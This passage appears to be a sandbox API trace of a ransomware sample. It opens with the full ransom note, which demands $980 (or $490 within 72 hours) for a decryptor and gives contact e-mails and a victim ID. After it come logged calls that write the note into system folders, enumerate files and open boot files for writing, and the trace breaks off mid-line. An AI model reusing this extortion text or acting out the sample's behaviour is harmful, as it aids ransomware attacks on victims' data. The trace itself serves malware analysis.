returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.347] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.348] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.348] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.349] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.349] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0188.349] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.351] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0188.351] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.352] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0188.352] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 